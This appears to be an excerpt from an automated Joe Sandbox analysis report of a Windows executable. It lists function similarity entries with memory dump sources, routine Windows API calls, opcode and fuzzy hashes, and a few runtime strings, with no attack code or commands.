                                                                                                                                                                        • Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: BreakDebug$CriticalSection$EnterLeave
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3888577265-0
                                                                                                                                                                        • Opcode ID: c44e6f749cf51194d18055909887b503eb6a2aff37391a8996bb50217290c366
                                                                                                                                                                        • Instruction ID: 82bf8e6db5daf164dc6ecb7207637cbc249a6047647999bd0e7d4bf6c6c854f2
                                                                                                                                                                        • Opcode Fuzzy Hash: c44e6f749cf51194d18055909887b503eb6a2aff37391a8996bb50217290c366
                                                                                                                                                                        • Instruction Fuzzy Hash: B402AC63A29B82E6EB548B25D450F797BA4FF45B84F084136CA4D837A9DF3CE491C390
                                                                                                                                                                        APIs
                                                                                                                                                                        • RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00000000,?,00007FF67FA473A0), ref: 00007FF67FA46B07
                                                                                                                                                                        • RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00000000,?,00007FF67FA473A0), ref: 00007FF67FA46C51
                                                                                                                                                                        • RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00000000,?,00007FF67FA473A0), ref: 00007FF67FA46D33
                                                                                                                                                                        • RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00000000,?,00007FF67FA473A0), ref: 00007FF67FA46D49
                                                                                                                                                                        • RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00000000,?,00007FF67FA473A0), ref: 00007FF67FA46DBE
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ExceptionFailFastRaise
                                                                                                                                                                        • String ID: [ KeepUnwinding ]
                                                                                                                                                                        • API String ID: 2546344036-400895726
                                                                                                                                                                        • Opcode ID: 37b542edfd6e6a04d6d6af4a5e84d7cb03416debfb2b6644f32ce5e3f49ff12d
                                                                                                                                                                        • Instruction ID: 5cfa0414c0a1af25ab2c8e3a67a6bb5819886af0eac01303695cd15b95b0a1ff
                                                                                                                                                                        • Opcode Fuzzy Hash: 37b542edfd6e6a04d6d6af4a5e84d7cb03416debfb2b6644f32ce5e3f49ff12d
                                                                                                                                                                        • Instruction Fuzzy Hash: D1B17DB3A29B42C1EB948F29D481AB973A5FB44F48F184136CE4D8B798DF39E455C390
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: SwitchThread
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 115865932-0
                                                                                                                                                                        • Opcode ID: ddf5a7c59728b91961856a1f3de8d77b860fc2794b24d806c874d2325e124f05
                                                                                                                                                                        • Instruction ID: 647e717ff6b14e52fae22aa9f6ea3b0e70b4694702569438e3efc788f78c8ea0
                                                                                                                                                                        • Opcode Fuzzy Hash: ddf5a7c59728b91961856a1f3de8d77b860fc2794b24d806c874d2325e124f05
                                                                                                                                                                        • Instruction Fuzzy Hash: 60D18F33B28685C6EB608F16D440F6A77A1FB85B94F444636DA9E87788DF3CE441C7A0
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: BreakDebug
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 456121617-0
                                                                                                                                                                        • Opcode ID: 24780f21546bd015505d40b07dff922e5db3dc92a0b137180c1451863a2d226f
                                                                                                                                                                        • Instruction ID: 365b4c290f86e03713f129209b5a5858587c71608d8db80e67758f4b0e44b611
                                                                                                                                                                        • Opcode Fuzzy Hash: 24780f21546bd015505d40b07dff922e5db3dc92a0b137180c1451863a2d226f
                                                                                                                                                                        • Instruction Fuzzy Hash: 73E1BB73A29B86C6EB109F1DD844A7977A4EB15BD4F100235EA5D873A4EF3CE481C380
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: BuffersFlushProcessWrite
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2982998374-0
                                                                                                                                                                        • Opcode ID: 79d0f43756a16d64338861bbba21ee80fd32cc7b8ee7bde5ac8cae3f237e486d
                                                                                                                                                                        • Instruction ID: db64207e544019ef904b8f9f786e1d30b0bb1de2e29f6780f561bd8855e87f71
                                                                                                                                                                        • Opcode Fuzzy Hash: 79d0f43756a16d64338861bbba21ee80fd32cc7b8ee7bde5ac8cae3f237e486d
                                                                                                                                                                        • Instruction Fuzzy Hash: BA5109A3B2C7C1CAFA628A64E404BB95B94EB917C0F598131CE6D87BC1EE7CD940C340
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetEnabledXStateFeatures.KERNEL32(?,?,?,?,?,00007FF67FA44896,?,?,?,?,?,?,00007FF67FA41EA0), ref: 00007FF67FA50531
                                                                                                                                                                        • GetEnabledXStateFeatures.KERNEL32(?,?,?,?,?,00007FF67FA44896,?,?,?,?,?,?,00007FF67FA41EA0), ref: 00007FF67FA50590
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: EnabledFeaturesState
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1557480591-0
                                                                                                                                                                        • Opcode ID: 6a010aaf3d9dfb2ad17c8b6f662b67376a88e00fe7fb95adbc059e65881bfa60
                                                                                                                                                                        • Instruction ID: 0210cf1b1b3a963ea06b4de29fae588a636cedeae095d0a8ee4a0a5ae1c6ff93
                                                                                                                                                                        • Opcode Fuzzy Hash: 6a010aaf3d9dfb2ad17c8b6f662b67376a88e00fe7fb95adbc059e65881bfa60
                                                                                                                                                                        • Instruction Fuzzy Hash: 8E51F533F2C2178AFF6844599499B3943879BE5354F85C538D94ED3AC1EDBFD8824284
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: @
                                                                                                                                                                        • API String ID: 0-2766056989
                                                                                                                                                                        • Opcode ID: 6e82094639824c14ab4293de4ec13a988e764ae228435d9a0dabbc53190a5c10
                                                                                                                                                                        • Instruction ID: 565f2ac50868e58261bdd71061b342a24657a9d012d8fd1d0df7f50a17246e91
                                                                                                                                                                        • Opcode Fuzzy Hash: 6e82094639824c14ab4293de4ec13a988e764ae228435d9a0dabbc53190a5c10
                                                                                                                                                                        • Instruction Fuzzy Hash: DD62AFB7A25B0687E7088F2CE455B7937A5FB94B88F158136CA1D83798DF38DA11C780
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: BreakCounterCreateDebugEventPerformanceQuery
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4239280443-0
                                                                                                                                                                        • Opcode ID: 5491d3f8da2e797241490e3cda2db23de3b51a53647b4561e21f0ad4d068944b
                                                                                                                                                                        • Instruction ID: 0a61003901fc20bf8927ebd9dd9faca942dc40e31d644dc1dd4a5ba901fc1c28
                                                                                                                                                                        • Opcode Fuzzy Hash: 5491d3f8da2e797241490e3cda2db23de3b51a53647b4561e21f0ad4d068944b
                                                                                                                                                                        • Instruction Fuzzy Hash: 3542F933D29B4285E7008F24BCA4A7637A8FF5AB44F119739D98C92765EF7CA191D380
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Count64Tick
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1927824332-0
                                                                                                                                                                        • Opcode ID: d7ae4015b6747c4f2a88c3bcd0e3919ab44728c05b91e0697f58cdc10b5d3ecf
                                                                                                                                                                        • Instruction ID: 56175ec4bc5cc46883790ab5b7ce9e2ec01a027f0066fe3cc06530b57060ac1f
                                                                                                                                                                        • Opcode Fuzzy Hash: d7ae4015b6747c4f2a88c3bcd0e3919ab44728c05b91e0697f58cdc10b5d3ecf
                                                                                                                                                                        • Instruction Fuzzy Hash: B4D1CD33B38A4696EB159B25C944ABDA3A1BF41F88F214135DE0EC7691DF7CE881C780
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 0-3916222277
                                                                                                                                                                        • Opcode ID: cd09ef96d8f17e625544f5d09aacbfbf5b704350f56f2afae0a11c1b875b7772
                                                                                                                                                                        • Instruction ID: 7ffcf78932691d92415737575c91f326679fb61acfb5d9afba8f3f434422a64b
                                                                                                                                                                        • Opcode Fuzzy Hash: cd09ef96d8f17e625544f5d09aacbfbf5b704350f56f2afae0a11c1b875b7772
                                                                                                                                                                        • Instruction Fuzzy Hash: 7C429E33E28B86C6EA108B19E440E7A77A0FB55BA0F454335DA6D87798DF3CE454D390
                                                                                                                                                                        Strings
                                                                                                                                                                        • ========== ENDGC %d (gen = %lu, collect_classes = %lu) ===========}, xrefs: 00007FF67FA6A256
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: ========== ENDGC %d (gen = %lu, collect_classes = %lu) ===========}
                                                                                                                                                                        • API String ID: 0-2256439813
                                                                                                                                                                        • Opcode ID: 7bd6a443cfe3054721747132375e6f82add6f116c3b8a460bf02874ed9b0fa60
                                                                                                                                                                        • Instruction ID: 371a647f50c64a3445d505a88907102f2143dc6506a52bd8d4aa58732236ac5a
                                                                                                                                                                        • Opcode Fuzzy Hash: 7bd6a443cfe3054721747132375e6f82add6f116c3b8a460bf02874ed9b0fa60
                                                                                                                                                                        • Instruction Fuzzy Hash: 76429E73A29B86CAEA058B29D440B7A77A0FF16F44F144235DA4D87361EF3DE462C380
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: ?
                                                                                                                                                                        • API String ID: 0-1684325040
                                                                                                                                                                        • Opcode ID: c36884137a1fbdc5629651c62ab30761a03d17dd0682946ebc7bc0764feb72a2
                                                                                                                                                                        • Instruction ID: c3906b4bcbed431ae5087ffa056dfcdaaf909fad616788e757ca724284065b0d
                                                                                                                                                                        • Opcode Fuzzy Hash: c36884137a1fbdc5629651c62ab30761a03d17dd0682946ebc7bc0764feb72a2
                                                                                                                                                                        • Instruction Fuzzy Hash: 1612CF73B28A82C2EA10CB15E484B7A73A5FBA5B94F544632DE5D83794DF3CE481C780
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00007FF67FA44879,?,?,?,?,?,?,00007FF67FA41EA0), ref: 00007FF67FA500FC
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Time$FileSystem
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2086374402-0
                                                                                                                                                                        • Opcode ID: b5b44fb1cfa246b99875fe13986ad365462ea6fd88d0f75c6747b66273541516
                                                                                                                                                                        • Instruction ID: 745868ccfd8e66d666dafd7ba5700fcf1e02fdabc0f02526e378d9e60a4da657
                                                                                                                                                                        • Opcode Fuzzy Hash: b5b44fb1cfa246b99875fe13986ad365462ea6fd88d0f75c6747b66273541516
                                                                                                                                                                        • Instruction Fuzzy Hash: 61216B32E29B5286E7508B68F851A6A33E0BB89B44F404239E54CC3761EF3CE484C781
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CounterPerformanceQuery
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2783962273-3916222277
                                                                                                                                                                        • Opcode ID: 0f497518f3011c90386f56ae0dd19987edc3a4fef3325d72aee3a22fc2e24883
                                                                                                                                                                        • Instruction ID: 7066450f5f6211e885dbf8f55f0a0ef07fbdfc94de4613ed6b7c743a5b963b76
                                                                                                                                                                        • Opcode Fuzzy Hash: 0f497518f3011c90386f56ae0dd19987edc3a4fef3325d72aee3a22fc2e24883
                                                                                                                                                                        • Instruction Fuzzy Hash: FFD1D863A2CA42C1EA118B19E550A7977A5FB46FA4F144331EE6D937D4EF3CE451C380
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetLocaleInfoEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00007FF67FAD90F0
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
